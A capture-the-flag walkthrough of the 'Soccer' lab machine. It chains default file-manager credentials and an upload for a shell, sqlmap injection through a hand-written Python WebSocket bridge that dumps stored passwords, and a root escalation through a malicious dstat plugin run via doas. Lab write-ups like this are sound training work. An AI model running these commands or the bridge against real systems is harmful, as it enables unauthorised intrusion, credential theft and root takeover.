Rustscan
rustscan -a soccer.htb
Output:
PORT     STATE SERVICE         REASON
22/tcp   open  ssh             syn-ack
80/tcp   open  http            syn-ack
9091/tcp open  xmltec-xmlmail  syn-ack
Port 9091: "xmltec-xmlmail" is only the /etc/services name for this port number, not a fingerprint of what is listening; the service is identified later in the write-up (it is a WebSocket server).
Port 80: the soccer.htb website.
Gobuster
Directory brute-force of http://soccer.htb (gobuster dir output below). I also fuzzed for virtual hosts with ffuf; when doing that, filter out the catch-all response (for example with -fs on the size the default vhost returns for every name), otherwise every candidate shows up as a hit:
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.soccer.htb" -u http://soccer.htb
Output (gobuster):
/index.html (Status: 200) [Size: 6917]
/.html      (Status: 403) [Size: 162]
/tiny       (Status: 301) [Size: 178] [--> http://soccer.htb/tiny/]
/tiny/ is Tiny File Manager 2.4.3, and there is a public RCE exploit for that version:
https://raw.githubusercontent.com/febinrev/tinyfilemanager-2.4.3-exploit/main/exploit.sh
Let's follow the example...
The default credentials it uses are correct (the login works), but the exploit script itself does not work.
User: admin
Password: admin@123
Reverse shell
The script only automates an authenticated file upload through the file manager, so the same upload can be done by hand with the credentials above to get a reverse shell.
Upgrade the shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm   # allows clear and other terminal-aware commands
Then Ctrl + Z to background the shell, and in the local terminal:
stty raw -echo; fg  # gives tab completion, Ctrl+C and arrow keys in the remote shell
lse.sh
[!] fst020 Uncommon setuid binaries........................................ yes!
---
/usr/local/bin/doas
[*] fst000 Writable files outside user's home.............................. yes!
[*] fst080 Can we read subdirectories under /home?......................... yes!
doas is the OpenBSD-style sudo replacement; its policy lives in /etc/doas.conf, which is checked below.
/etc/passwd (interesting entries; player is the only regular user):
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
player:x:1001:1001::/home/player:/bin/bash
mysql:x:113:121:MySQL Server,,,:/nonexistent:/bin/false
_laurel:x:997:997::/var/log/laurel:/bin/false
LinPEAS
╔══════════╣ CVEs Check
Vulnerable to CVE-2021-3560
Potentially Vulnerable to CVE-2022-2588
These are version-based heuristics and were not needed for this box.
╔══════════╣ Checking doas.conf
permit nopass player as root cmd /usr/bin/dstat
The doas policy lets the user player run /usr/bin/dstat as root without a password.
cat /etc/nginx/sites-enabled/*
Output:
# We already know this one
server_name soccer.htb;
server_name soc-player.soccer.htb;
root /root/app/views;
I need to add soc-player.soccer.htb to my /etc/hosts.
It's another website, interesting.
Its document root is under /root/app/views, so the application behind it is deployed from root's home; compromising it may lead to root.
I've created an account on soc-player.soccer.htb.
After registering I have a ticket number, 85240, and a page to check it.
The check page uses this script to talk to the server:
<script>
var ws = new WebSocket("ws://soc-player.soccer.htb:9091");
window.onload = function () {
    var btn = document.getElementById('btn');
    var input = document.getElementById('id');
    ws.onopen = function (e) {
        console.log('connected to the server')
    }
    input.addEventListener('keypress', (e) => {
        keyOne(e)
    });
    function keyOne(e) {
        e.stopPropagation();
        if (e.keyCode === 13) {
            e.preventDefault();
            sendText();
        }
    }
    function sendText() {
        var msg = input.value;
        if (msg.length > 0) {
            // the ticket number is sent as JSON over the WebSocket, not as an HTTP parameter
            ws.send(JSON.stringify({
                "id": msg
            }))
        }
        else append("????????")
    }
}
ws.onmessage = function (e) {
    append(e.data)
}
function append(msg) {
    let p = document.querySelector("p");
    // let randomColor = '#' + Math.floor(Math.random() * 16777215).toString(16);
    // p.style.color = randomColor;
    p.textContent = msg
}
</script>
var ws = new WebSocket("ws://soc-player.soccer.htb:9091");
The ticket check is not an HTTP request: the id is sent as JSON over a WebSocket to port 9091, the service rustscan could not name. sqlmap cannot talk to a WebSocket directly, so I ran a small local HTTP-to-WebSocket proxy on port 8081 that forwards the id parameter as that JSON message, and pointed sqlmap at it:
sqlmap -u "http://localhost:8081/?id=1" -p id --dbs --dbms=mysql
sqlmap -u "http://localhost:8081/?id=1" -p id -D soccer_db --tables --dbms=mysql
sqlmap -u "http://localhost:8081/?id=1" -p id -D soccer_db -T accounts --dump --dbms=mysql
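The sqlmap commands above target localhost:8081, which implies a local bridge that turns each HTTP request into the WebSocket message the page's script sends. The following is an added example of such a bridge, written for this write-up and not part of the original post or of the target application; it assumes the endpoint ws://soc-player.soccer.htb:9091 and the {"id": ...} message shape shown in the script above, and that each reply is one short text frame. It uses only the standard library, so the handshake and framing are done by hand.

```python
"""HTTP-to-WebSocket bridge so sqlmap can inject into the WebSocket 'id' field (added example)."""
import base64
import hashlib
import json
import os
import socket
import struct
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Optional, Tuple
from urllib.parse import parse_qs, urlparse

WS_HOST = "soc-player.soccer.htb"   # endpoint taken from the page's JavaScript (assumption: resolvable via /etc/hosts)
WS_PORT = 9091
LISTEN_PORT = 8081                  # sqlmap targets http://localhost:8081/?id=1
WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"  # fixed handshake GUID from RFC 6455


def accept_key(client_key: str) -> str:
    """Sec-WebSocket-Accept value a server must echo for client_key (RFC 6455 section 4.2.2)."""
    return base64.b64encode(hashlib.sha1((client_key + WS_GUID).encode()).digest()).decode()


def encode_text_frame(payload: bytes, mask: Optional[bytes] = None) -> bytes:
    """Build one FIN text frame. Client-to-server frames must be masked (mask bit set)."""
    mask = os.urandom(4) if mask is None else mask
    header = bytearray([0x81])            # FIN=1, RSV=0, opcode=1 (text)
    n = len(payload)
    if n < 126:
        header.append(0x80 | n)           # mask bit + 7-bit length
    elif n < 0x10000:
        header.append(0x80 | 126)
        header += struct.pack(">H", n)    # 16-bit extended length
    else:
        header.append(0x80 | 127)
        header += struct.pack(">Q", n)    # 64-bit extended length
    masked = bytes(b ^ mask[i % 4] for i, b in enumerate(payload))
    return bytes(header) + bytes(mask) + masked


def decode_frame(data: bytes) -> Tuple[int, bytes]:
    """Parse one frame (masked or not) and return (opcode, payload)."""
    opcode = data[0] & 0x0F
    is_masked = bool(data[1] & 0x80)
    n, pos = data[1] & 0x7F, 2
    if n == 126:
        n, pos = struct.unpack(">H", data[2:4])[0], 4
    elif n == 127:
        n, pos = struct.unpack(">Q", data[2:10])[0], 10
    mask = b""
    if is_masked:
        mask, pos = data[pos:pos + 4], pos + 4
    payload = data[pos:pos + n]
    if is_masked:
        payload = bytes(b ^ mask[i % 4] for i, b in enumerate(payload))
    return opcode, payload


def ws_query(value: str, host: str = WS_HOST, port: int = WS_PORT, timeout: float = 10.0) -> str:
    """Open a WebSocket to host:port, send {"id": value} as the page's JS does, return the first reply."""
    key = base64.b64encode(os.urandom(16)).decode()
    request = (
        f"GET / HTTP/1.1\r\nHost: {host}:{port}\r\nUpgrade: websocket\r\nConnection: Upgrade\r\n"
        f"Sec-WebSocket-Key: {key}\r\nSec-WebSocket-Version: 13\r\n\r\n"
    )
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request.encode())
        buf = b""
        while b"\r\n\r\n" not in buf:         # read the 101 Switching Protocols response
            chunk = sock.recv(4096)
            if not chunk:
                raise ConnectionError("server closed the connection during the handshake")
            buf += chunk
        head, _, rest = buf.partition(b"\r\n\r\n")
        if accept_key(key).encode() not in head:
            raise ConnectionError("Sec-WebSocket-Accept mismatch: not a WebSocket server?")
        # same shape as JSON.stringify({"id": msg}) in the page's client script
        sock.sendall(encode_text_frame(json.dumps({"id": value}, separators=(",", ":")).encode()))
        while not rest:                      # replies here are short, so one frame per recv is enough
            rest = sock.recv(4096)
        _, payload = decode_frame(rest)
        return payload.decode(errors="replace")


class Bridge(BaseHTTPRequestHandler):
    """GET /?id=<x>  ->  WebSocket {"id":"<x>"}  ->  reply returned as the HTTP body."""

    def do_GET(self) -> None:
        value = parse_qs(urlparse(self.path).query).get("id", [""])[0]
        try:
            body = ws_query(value).encode()
        except OSError as exc:               # covers refused connections and socket timeouts
            body = f"bridge error: {exc}".encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/plain; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args) -> None:    # sqlmap sends thousands of requests; keep stdout quiet
        pass


if __name__ == "__main__":
    HTTPServer(("127.0.0.1", LISTEN_PORT), Bridge).serve_forever()
```

Run it, then point sqlmap at http://localhost:8081/?id=1 as above. Boolean-based detection works because the bridge returns the server's reply text as the HTTP body; for time-based payloads raise the timeout in ws_query above the sleep sqlmap uses, or the bridge will report an error instead of a slow response.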
The accounts table gives a login for the website user, which also works for SSH:
User: player
Password: (dumped from soccer_db.accounts)
SSH
Log in as player with the dumped password.
Escalation
As we saw with LinPEAS (doas.conf), player can run this as root:
doas /usr/bin/dstat
https://gtfobins.github.io/gtfobins/dstat/
GTFOBins: dstat allows you to run arbitrary Python scripts loaded as "external plugins" if they are located in one of the directories stated in the dstat man page under "FILES". A file named dstat_<name>.py in such a directory is loaded with --<name>, and because doas runs dstat as root, the plugin's code runs as root. Check first that one of those directories is writable by player (here /usr/local/share/dstat):
echo 'import os; os.execv("/bin/sh", ["sh"])' >/usr/local/share/dstat/dstat_xxx.py
doas -u root /usr/bin/dstat --xxx